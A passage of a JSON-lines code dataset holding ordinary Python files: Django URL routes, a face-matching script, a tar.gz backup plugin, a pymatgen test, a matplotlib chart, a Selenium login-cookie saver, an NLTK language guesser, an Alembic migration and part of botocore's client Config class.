{"api_name": "datetime.timedelta", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "290058908", "text": "from django.urls import path\nfrom customers.views import (\n\tcustomer_create_view, \n\tcustomer_detail_view, \n\tcustomer_delete_view, \n\tcustomer_list_view,\n\tcustomer_update_view,\n\n)\n\napp_name = 'customers'\nurlpatterns = [\n path('create/', customer_create_view),\n path('/', customer_detail_view, name='customer-detail'),\n path('/update', customer_update_view, name='customer-update'),\n path('/delete', customer_delete_view, name='customer-delete'),\n path('', customer_list_view, name='customer-list'),\n\n]\n", "sub_path": "src/customers/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 548, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "customers.views.customer_create_view", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "customers.views.customer_detail_view", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "customers.views.customer_update_view", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "customers.views.customer_delete_view", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "customers.views.customer_list_view", "line_number": 17, "usage_type": "argument"}]} +{"seq_id": "217659164", "text": "import face_recognition\r\nimport os\r\nfrom PIL import Image\r\nimport pickle\r\nimport gzip\r\n#pathik = \"/root/env/megasuperfacedetectionbot/\"\r\npathik = \"\"\r\ndef listdir_nohidden(path):\r\n for f in os.listdir(path):\r\n if not f.startswith('.'):\r\n yield f\r\n\r\ndef analyzeValues(values):\r\n try: \r\n return int((sum(values)/len(values)))\r\n except: \r\n return 0\r\n\r\n\r\n\r\ndef checkFace(**kwargs):\r\n\terrorCounter=0\r\n\tmaxValue=0\r\n\tmostLikely=\"unknown\"\r\n\tanalyze = -1\r\n\t#path=f\"{pathik}faces/known_faces/\"\r\n\tpath=\"faces/known_faces/\"\r\n\tWDILL = face_recognition.load_image_file(\"WDILL.jpg\")\r\n\tWDILLenc=face_recognition.face_encodings(WDILL)\r\n\tfiles = listdir_nohidden(path)\r\n\tfor file in files:\r\n\t\tfaces = listdir_nohidden(path+file+\"/faceEncodings/\")\r\n\t\tfor face in faces:\r\n\t\t\twith gzip.open(path+file+\"/faceEncodings/\"+face, 'rb') as f:\r\n\t\t\t\ttry:\r\n\t\t\t\t\timageEncoding = pickle.load(f)\r\n\t\t\t\t\tanalyze=((1-(face_recognition.face_distance(imageEncoding,WDILLenc))[0])*100)\r\n\t\t\t\t\tf.close()\r\n\t\t\t\texcept:\r\n\t\t\t\t\terrorCounter+=1\r\n\t\t\t\t\t#analyze=analyzeValues(percentage)\r\n\t\tif(kwargs.get(\"outputEveryLine\",True)==True):\r\n\t\t\tyield (\"You look like \"+file+\" with \"+str(analyze)+\"chance\")\r\n\t\tif (analyze>maxValue):\r\n\t\t\tmaxValue=analyze\r\n\t\t\tmostLikely=file\r\n\t\t\t#percentage=[]\r\n\tyield \"end\"\r\n\tyield \"end\"\r\n\t#answer = str(\"most likely you look like \"+(mostLikely)+\" with \"+str(maxValue)+\"chance\\nErrors:\"+str(errorCounter))\r\n\tanswer = \"most likely you look like \" + str(mostLikely) + \" with \" + str(maxValue)+\" percent chance \\n Errors:\" +str(errorCounter)\r\n\tyield answer\r\n\tif(kwargs.get(\"getFinalFace\",False)==True):\r\n\t\tim1 = Image.open(path+mostLikely+\"/main.jpg\")\r\n\t\tim1 = im1.save(f\"{pathik}mostLikely.jpg\")\r\n\r\n \r\n\r\nfor i in checkFace(getFinalFace=True,outputEveryLine=False):\r\n print(i)", "sub_path": "checkGenerator.py", "file_name": "checkGenerator.py", "file_ext": "py", "file_size_in_byte": 1802, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 9, "usage_type": "call"}, {"api_name": "face_recognition.load_image_file", "line_number": 28, "usage_type": "call"}, {"api_name": "face_recognition.face_encodings", "line_number": 29, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 34, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 36, "usage_type": "call"}, {"api_name": "face_recognition.face_distance", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "632583726", "text": "#!/usr/bin/env python3\n\"\"\"targz plugin for the archive wrapper.\n\nBearable: Tolerable backup and restore.\nhttps://www.github.com/Effenberg0x0/bearable\n\nAlvaro Leal , 2019\n\"\"\"\nimport tarfile\n# from os.path import basename\nimport uuid\nimport os\nimport json\nfrom os import path\n\n\nclass Archive(object):\n\n def get_unique_filename(self, filename):\n return filename + '.' + str(uuid.uuid4())\n\n def create_from_buffer(self, buffer, buffer_filename, tarfile_path):\n tmp_file_name = self.get_unique_filename(buffer_filename)\n with open(tmp_file_name, 'w') as tmp_file:\n tmp_file.write(json.dumps(buffer))\n\n tar_file = tarfile.open(tarfile_path, \"w|gz\")\n tar_file.add(name=tmp_file_name, arcname=buffer_filename, recursive=False)\n tar_file.close()\n os.remove(tmp_file_name)\n\n def create(self, archive_path, file_paths, dirname, save_full_path=False):\n tar = tarfile.open(archive_path, \"w:gz\")\n print(\"ARCHIVE_PATH: {0}\".format(archive_path))\n if not save_full_path:\n base_path = os.path.commonpath(file_paths)\n\n for _file in file_paths:\n if not save_full_path:\n arcname = _file[_file.find(base_path) + len(base_path):] \n else:\n arcname = _file\n\n arcname = '/' + dirname + arcname\n tar.add(name=_file, arcname=arcname, recursive=False)\n tar.close()\n\n def extract(self, archive_path, destination_path):\n if not path.isfile(archive_path):\n raise FileNotFoundError(\"Source archive not found.\")\n\n if not path.isdir(destination_path):\n raise FileNotFoundError(\"Destination dir not found.\")\n\n archive = tarfile.open(archive_path)\n archive.extractall(path=destination_path)", "sub_path": "plugins/archive/targz.py", "file_name": "targz.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 27, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 30, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.commonpath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "151533077", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"test for parse_atat\"\"\"\nfrom __future__ import division\nimport os\nimport unittest\nfrom pymatgen.io.vasp import Poscar\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\n__date__ = 'Mar 28 2017'\n\nTEST_PATH = '/Users/enoki/Researches/Analysis/Codes/01_testRun/'\n\n\ndef main():\n \"\"\"\n Test\n \"\"\"\n unittest.main()\n\n\nclass Test(unittest.TestCase): #pylint: disable=R0903\n \"\"\"\n 空間群が��わってしまう問題について\n \"\"\"\n PATH = os.path.join(TEST_PATH, 'vasp_poscar')\n\n def test_read_str(self):\n \"\"\" read_str \"\"\"\n src = os.path.join(self.PATH, 'POSCAR_GS2_34246_cart')\n srcpos = Poscar.from_file(src)\n dst = os.path.join(self.PATH, 'POSCAR_GS2_34246_remake')\n srcpos.write_file(dst)\n print(srcpos)\n finder = SpacegroupAnalyzer(srcpos.structure)\n spg = finder.get_space_group_symbol()\n print(spg)\n\n prim_str = finder.get_primitive_standard_structure()\n finder2 = SpacegroupAnalyzer(prim_str)\n spg2 = finder2.get_space_group_symbol()\n print(spg2)\n # print(finder)\n\n src = os.path.join(self.PATH, 'SPOSCAR')\n srcpos = Poscar.from_file(src)\n finder = SpacegroupAnalyzer(srcpos.structure)\n spg = finder.get_space_group_symbol()\n print(spg)\n\n # prim_str = finder.get_primitive_standard_structure()\n prim_str = finder.get_conventional_standard_structure()\n finder2 = SpacegroupAnalyzer(prim_str)\n spg2 = finder2.get_space_group_symbol()\n dst2 = os.path.join(self.PATH, 'POSCAR_GS2_34246_remake2')\n dstpos = Poscar(prim_str)\n dstpos.write_file(dst2)\n # print(spg2)\n\n def _test_withoutN(self):\n \"\"\" withoutN \"\"\"\n src = os.path.join(self.PATH, 'POSCAR_withoutN')\n srcpos = Poscar.from_file(src)\n dst = os.path.join(self.PATH, 'POSCAR_withoutN_remake')\n srcpos.write_file(dst)\n print(srcpos)\n finder = SpacegroupAnalyzer(srcpos.structure)\n spg = finder.get_space_group_symbol()\n print(spg)\n\n # prim_str = finder.get_primitive_standard_structure()\n # finder2 = SpacegroupAnalyzer(prim_str)\n # spg2 = finder2.get_space_group_symbol()\n # print(spg2)\n\n # std_str = finder.get_conventional_standard_structure()\n\n\n\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "test/test_vasp_poscar.py", "file_name": "test_vasp_poscar.py", "file_ext": "py", "file_size_in_byte": 2417, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.main", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar.from_file", "line_number": 31, "usage_type": "call"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 35, "usage_type": "call"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar.from_file", "line_number": 46, "usage_type": "call"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 46, "usage_type": "name"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 47, "usage_type": "call"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar.from_file", "line_number": 63, "usage_type": "call"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 63, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "339849957", "text": "import matplotlib.pyplot as plt\nfont = {'family' : 'MicroSoft YaHei',\n 'weight' : 'bold'\n }\nplt.rc('font', **font)\n#绘制横着的条形图\na = ['战狼2','速激2','变形金刚5','摔跤吧爸爸']\nb = [56.01,26.94,44.9,39.2]\nx = len(a)\nplt.figure(figsize=(15,10),dpi=100)\nplt.barh(a,b,height=0.3)\nplt.savefig(\"../imag/piaofang.png\")", "sub_path": "code/py_matplotlib/ex4.py", "file_name": "ex4.py", "file_ext": "py", "file_size_in_byte": 350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.rc", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "482457222", "text": "import json\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\nopts = Options()\nopts.add_argument(\n \"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36\")\n# opts.add_argument('--headless') # 无头模式\n\ndriver = webdriver.Chrome(chrome_options=opts)\n\n\ndef Login():\n driver.get(\"http://s.dianping.com/event/shenzhen\")\n login = driver.find_element_by_xpath('//*[contains(text(),\"登录\")]')\n login.click()\n print('请扫描登录')\n sleep(10)\n dp = driver.get_cookie('dper')\n if dp is not None:\n print(dp)\n with open(\"dper.txt\", \"r+\") as f:\n f.seek(0)\n f.write(dp['value'])\n f.write('\\n')\n print('登录成功,dper存入成功')\n else:\n print('未登录成功,dper存取失败')\n\n\n\n#\n# def writeCookies(cookies):\n# \"\"\"\n# 从浏览器中向文件写入cookies\n# \"\"\"\n# with open(\"cookies.json\", \"w\") as f:\n# json.dump(cookies, f)\n\n\nif __name__ == '__main__':\n try:\n Login()\n except Exception as e:\n print(e)\n # driver.quit()\n print('退出浏览器了')\n", "sub_path": "src/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 12, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "72457447", "text": "#!/usr/bin/env python\n\n## Benjamin Williams \n## \n## --\n## Tower of Babel script, determines which language a particular piece of text is\n## by making use of nltk.\n##\n\nimport nltk;\n\ncommonWords = {\n\t\"English\" : [\n\t\t\"the\", \"of\", \"and\", \"to\", \"in\", \"i\", \"that\", \"was\", \"his\", \"he\", \"it\", \"with\", \"is\", \"for\", \"as\", \"had\", \"you\", \"not\", \n\t\t\"be\", \"her\", \"on\", \"at\", \"by\", \"which\", \"have\", \"or\", \"from\", \"this\", \"him\", \"but\", \"all\", \"she\", \"they\", \"were\", \"my\",\n\t\t\"are\", \"me\"\n\t],\n\t\n\t\"Spanish\" : [\n\t\t\"que\", \"de\", \"no\", \"a\", \"la\", \"el\", \"es\", \"y\", \"en\", \"lo\", \"un\", \"por\", \"me\", \"una\", \"te\", \"los\", \"se\", \"con\", \"para\",\n\t\t\"mi\", \"esta\", \"si\", \"bien\", \"pero\", \"yo\", \"eso\", \"las\", \"su\", \"tu\", \"aqui\", \"del\", \"al\", \"como\", \"le\", \"mas\"\n\t],\n\t\n\t\"German\" : [\n\t\t\"der\", \"und\", \"die\", \"in\", \"ist\", \"von\", \"den\", \"des\", \"eine\", \"im\", \"ein\", \"mit\", \"das\", \"zu\", \"für\", \"dem\", \"sich\",\n\t\t\"auf\", \"als\", \"auch\", \"wird\", \"oder\", \"aus\", \"wurde\", \"werden\", \"sind\", \"an\", \"einer\", \"nicht\", \"durch\", \"nach\", \"bei\",\n\t\t\"es\", \"war\", \"zum\", \"er\", \"zur\", \"am\", \"einem\", \"einen\", \"sie\", \"bis\", \"man\", \"über\", \"um\", \"dass\", \"wie\", \"hat\", \"eines\",\n\t\t\"nur\", \"Stadt\", \"kann\", \"bezeichnet\", \"noch\", \"aber\", \"siehe\", \"vor\", \"so\", \"unter\"\n\t],\n\t\n\t\"Dutch\" : [\n\t\t\"de\", \"van\", \"een\", \"het\", \"en\", \"in\", \"is\", \"dat\", \"op\", \"te\", \"De\", \"zijn\", \"voor\", \"met\", \"die\", \"niet\", \"aan\", \"er\", \n\t\t\"om\", \"Het\", \"ook\", \"als\", \"dan\", \"maar\", \"bij\", \"of\", \"uit\", \"nog\", \"worden\", \"door\", \"naar\", \"heeft\", \"tot\", \"ze\", \"wordt\",\n\t\t\"over\", \"hij\", \"In\", \"meer\", \"jaar\", \"was\", \"ik\", \"kan\", \"je\"\n\t],\n\t\n\t\"Croatian\" : [\n\t\t\"je\", \"da\", \"ne\", \"se\", \"to\", \"sam\", \"što\", \"na\", \"ti\", \"si\", \"mi\", \"za\", \"li\", \"ja\", \"su\", \"ali\", \"nije\", \"me\", \"ga\", \"te\",\n\t\t\"ovo\", \"samo\", \"bi\", \"kako\", \"od\", \"će\", \"sa\", \"dobro\", \"smo\", \"ako\", \"sve\", \"ću\", \"kao\", \"tako\", \"znam\", \"biti\", \"ovdje\",\n\t\t\"nisam\", \"mogu\", \"ste\", \"bio\", \"zašto\", \"još\", \"pa\", \"nešto\", \"redu\", \"on\", \"bilo\", \"koji\", \"vas\"\n\t]\n};\n\nwhile True:\n\t#Get input and split it\n\tsentence = input(\"[Enter a sentence]\\r\\n$ \");\n\tsentenceChunks = nltk.word_tokenize(sentence);\n\n\t#Get the keys and setup another dictionary for counts of each language\n\tkeys = list(commonWords.keys());\n\tfreqCounts = dict(zip(keys, [ 0 ] * len(keys)));\n\n\t#Run through each word, if the word is in the common words, increment the counter\n\t#for the language.\n\tfor chunk in sentenceChunks:\n\t\tfor key in commonWords:\n\t\t\tif chunk in commonWords[key]:\n\t\t\t\tfreqCounts[key] += 1;\n\t\t\n\t#Find the language with the highest count\n\thighestValue = max(freqCounts.values());\n\n\t#Find all values and keys of the frequency count\n\tvalues = list(freqCounts.values());\n\tkeys = list(freqCounts.keys());\n\n\t#If there are more than one values in the frequency count dict with the same highest value,\n\t#we have a tie\n\tif values.count(highestValue) > 1:\n\t\tprint(\"I couldn't determine what language you typed.\\r\\n\");\n\t\t\n\t#Otherwise display the highest ranking (most likely) language\n\telse:\n\t\tindex = values.index(highestValue);\n\t\tprint(\"I think the language is \" + keys[index] + \"\\r\\n\");\n\t\t\n\t#And display the \"reasoning\"\n\t#print(\"\\r\\nREASONING (count of words matched)\");\n\t#print( \"----------------------------------\");\n\t#for key, value in freqCounts.items():\n\t#\tprint(\"%-10s --> %-3d\" % (key, value));\n\n", "sub_path": "lab4/babel.py", "file_name": "babel.py", "file_ext": "py", "file_size_in_byte": 3258, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nltk.word_tokenize", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "550891620", "text": "\"\"\"added skipped_wells table\n\nRevision ID: ef256df5169c\nRevises: 5181de7d6275\nCreate Date: 2017-05-10 10:27:49.116133\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ef256df5169c'\ndown_revision = '5181de7d6275'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('skipped_wells',\n sa.Column('schedule_id', sa.Integer(), nullable=True),\n sa.Column('well_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['schedule_id'], ['schedule.id'], ),\n sa.ForeignKeyConstraint(['well_id'], ['well.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('skipped_wells')\n # ### end Alembic commands ###\n", "sub_path": "alembic/versions/ef256df5169c_added_skipped_wells_table.py", "file_name": "ef256df5169c_added_skipped_wells_table.py", "file_ext": "py", "file_size_in_byte": 860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "458216766", "text": "# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\nimport copy\n\nfrom botocore.compat import OrderedDict\nfrom botocore.endpoint import DEFAULT_TIMEOUT, MAX_POOL_CONNECTIONS\nfrom botocore.exceptions import (\n InvalidMaxRetryAttemptsError,\n InvalidRetryConfigurationError,\n InvalidRetryModeError,\n InvalidS3AddressingStyleError,\n)\n\n\nclass Config:\n \"\"\"Advanced configuration for Botocore clients.\n\n :type region_name: str\n :param region_name: The region to use in instantiating the client\n\n :type signature_version: str\n :param signature_version: The signature version when signing requests.\n\n :type user_agent: str\n :param user_agent: The value to use in the User-Agent header.\n\n :type user_agent_extra: str\n :param user_agent_extra: The value to append to the current User-Agent\n header value.\n\n :type user_agent_appid: str\n :param user_agent_appid: A value that gets included in the User-Agent\n string in the format \"app/\". Allowed characters are\n ASCII alphanumerics and ``!$%&'*+-.^_`|~``. All other characters will\n be replaced by a ``-``.\n\n :type connect_timeout: float or int\n :param connect_timeout: The time in seconds till a timeout exception is\n thrown when attempting to make a connection. The default is 60\n seconds.\n\n :type read_timeout: float or int\n :param read_timeout: The time in seconds till a timeout exception is\n thrown when attempting to read from a connection. The default is\n 60 seconds.\n\n :type parameter_validation: bool\n :param parameter_validation: Whether parameter validation should occur\n when serializing requests. The default is True. You can disable\n parameter validation for performance reasons. Otherwise, it's\n recommended to leave parameter validation enabled.\n\n :type max_pool_connections: int\n :param max_pool_connections: The maximum number of connections to\n keep in a connection pool. If this value is not set, the default\n value of 10 is used.\n\n :type proxies: dict\n :param proxies: A dictionary of proxy servers to use by protocol or\n endpoint, e.g.:\n ``{'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}``.\n The proxies are used on each request.\n\n :type proxies_config: dict\n :param proxies_config: A dictionary of additional proxy configurations.\n Valid keys are:\n\n * ``proxy_ca_bundle`` -- The path to a custom certificate bundle to use\n when establishing SSL/TLS connections with proxy.\n\n * ``proxy_client_cert`` -- The path to a certificate for proxy\n TLS client authentication.\n\n When a string is provided it is treated as a path to a proxy client\n certificate. When a two element tuple is provided, it will be\n interpreted as the path to the client certificate, and the path\n to the certificate key.\n\n * ``proxy_use_forwarding_for_https`` -- For HTTPS proxies,\n forward your requests to HTTPS destinations with an absolute\n URI. We strongly recommend you only use this option with\n trusted or corporate proxies. Value must be boolean.\n\n :type s3: dict\n :param s3: A dictionary of S3 specific configurations.\n Valid keys are:\n\n * ``use_accelerate_endpoint`` -- Refers to whether to use the S3\n Accelerate endpoint. The value must be a boolean. If True, the\n client will use the S3 Accelerate endpoint. If the S3 Accelerate\n endpoint is being used then the addressing style will always\n be virtual.\n\n * ``payload_signing_enabled`` -- Refers to whether or not to SHA256\n sign sigv4 payloads. By default, this is disabled for streaming\n uploads (UploadPart and PutObject).\n\n * ``addressing_style`` -- Refers to the style in which to address\n s3 endpoints. Values must be a string that equals one of:\n\n * ``auto`` -- Addressing style is chosen for user. Depending\n on the configuration of client, the endpoint may be addressed in\n the virtual or the path style. Note that this is the default\n behavior if no style is specified.\n\n * ``virtual`` -- Addressing style is always virtual. The name of the\n bucket must be DNS compatible or an exception will be thrown.\n Endpoints will be addressed as such: ``mybucket.s3.amazonaws.com``\n\n * ``path`` -- Addressing style is always by path. Endpoints will be\n addressed as such: ``s3.amazonaws.com/mybucket``\n\n * ``us_east_1_regional_endpoint`` -- Refers to what S3 endpoint to use\n when the region is configured to be us-east-1. Values must be a\n string that equals:\n\n * ``regional`` -- Use the us-east-1.amazonaws.com endpoint if the\n client is configured to use the us-east-1 region.\n\n * ``legacy`` -- Use the s3.amazonaws.com endpoint if the client is\n configured to use the us-east-1 region. This is the default if\n the configuration option is not specified.\n\n\n :type retries: dict\n :param retries: A dictionary for configuration related to retry behavior.\n Valid keys are:\n\n * ``total_max_attempts`` -- An integer representing the maximum number of\n total attempts that will be made on a single request. This includes\n the initial request, so a value of 1 indicates that no requests\n will be retried. If ``total_max_attempts`` and ``max_attempts``\n are both provided, ``total_max_attempts`` takes precedence.\n ``total_max_attempts`` is preferred over ``max_attempts`` because\n it maps to the ``AWS_MAX_ATTEMPTS`` environment variable and\n the ``max_attempts`` config file value.\n * ``max_attempts`` -- An integer representing the maximum number of\n retry attempts that will be made on a single request. For\n example, setting this value to 2 will result in the request\n being retried at most two times after the initial request. Setting\n this value to 0 will result in no retries ever being attempted after\n the initial request. If not provided, the number of retries will\n default to the value specified in the service model, which is\n typically four retries.\n * ``mode`` -- A string representing the type of retry mode botocore\n should use. Valid values are:\n\n * ``legacy`` - The pre-existing retry behavior.\n\n * ``standard`` - The standardized set of retry rules. This will also\n default to 3 max attempts unless overridden.\n\n * ``adaptive`` - Retries with additional client side throttling.\n\n :type client_cert: str, (str, str)\n :param client_cert: The path to a certificate for TLS client authentication.\n\n When a string is provided it is treated as a path to a client\n certificate to be used when creating a TLS connection.\n\n If a client key is to be provided alongside the client certificate the\n client_cert should be set to a tuple of length two where the first\n element is the path to the client certificate and the second element is\n the path to the certificate key.\n\n :type inject_host_prefix: bool\n :param inject_host_prefix: Whether host prefix injection should occur.\n\n Defaults to True.\n\n Setting this to False disables the injection of operation parameters\n into the prefix of the hostname. This is useful for clients providing\n custom endpoints that should not have their host prefix modified.\n\n :type use_dualstack_endpoint: bool\n :param use_dualstack_endpoint: Setting to True enables dualstack\n endpoint resolution.\n\n Defaults to None.\n\n :type use_fips_endpoint: bool\n :param use_fips_endpoint: Setting to True enables fips\n endpoint resolution.\n\n Defaults to None.\n\n :type ignore_configured_endpoint_urls: bool\n :param ignore_configured_endpoint_urls: Setting to True disables use\n of endpoint URLs provided via environment variables and\n the shared configuration file.\n\n Defaults to None.\n\n :type tcp_keepalive: bool\n :param tcp_keepalive: Enables the TCP Keep-Alive socket option used when\n creating new connections if set to True.\n\n Defaults to False.\n\n :type request_min_compression_size_bytes: int\n :param request_min_compression_bytes: The minimum size in bytes that a\n request body should be to trigger compression. All requests with streaming\n input that don't contain the `requiresLength` trait will be compressed\n regardless of this setting.\n\n Defaults to None.\n\n :type disable_request_compression: bool\n :param disable_request_compression: Disables request body compression if\n set to True.\n\n Defaults to None.\n \"\"\"\n\n OPTION_DEFAULTS = OrderedDict(\n [\n ('region_name', None),\n ('signature_version', None),\n ('user_agent', None),\n ('user_agent_extra', None),\n ('user_agent_appid', None),\n ('connect_timeout', DEFAULT_TIMEOUT),\n ('read_timeout', DEFAULT_TIMEOUT),\n ('parameter_validation', True),\n ('max_pool_connections', MAX_POOL_CONNECTIONS),\n ('proxies', None),\n ('proxies_config', None),\n ('s3', None),\n ('retries', None),\n ('client_cert', None),\n ('inject_host_prefix', True),\n ('endpoint_discovery_enabled', None),\n ('use_dualstack_endpoint', None),\n ('use_fips_endpoint', None),\n ('ignore_configured_endpoint_urls', None),\n ('defaults_mode', None),\n ('tcp_keepalive', None),\n ('request_min_compression_size_bytes', None),\n ('disable_request_compression', None),\n ]\n )\n\n NON_LEGACY_OPTION_DEFAULTS = {\n 'connect_timeout': None,\n }\n\n def __init__(self, *args, **kwargs):\n self._user_provided_options = self._record_user_provided_options(\n args, kwargs\n )\n\n # Merge the user_provided options onto the default options\n config_vars = copy.copy(self.OPTION_DEFAULTS)\n defaults_mode = self._user_provided_options.get(\n 'defaults_mode', 'legacy'\n )\n if defaults_mode != 'legacy':\n config_vars.update(self.NON_LEGACY_OPTION_DEFAULTS)\n config_vars.update(self._user_provided_options)\n\n # Set the attributes based on the config_vars\n for key, value in config_vars.items():\n setattr(self, key, value)\n\n # Validate the s3 options\n self._validate_s3_configuration(self.s3)\n\n self._validate_retry_configuration(self.retries)\n\n def _record_user_provided_options(self, args, kwargs):\n option_order = list(self.OPTION_DEFAULTS)\n user_provided_options = {}\n\n # Iterate through the kwargs passed through to the constructor and\n # map valid 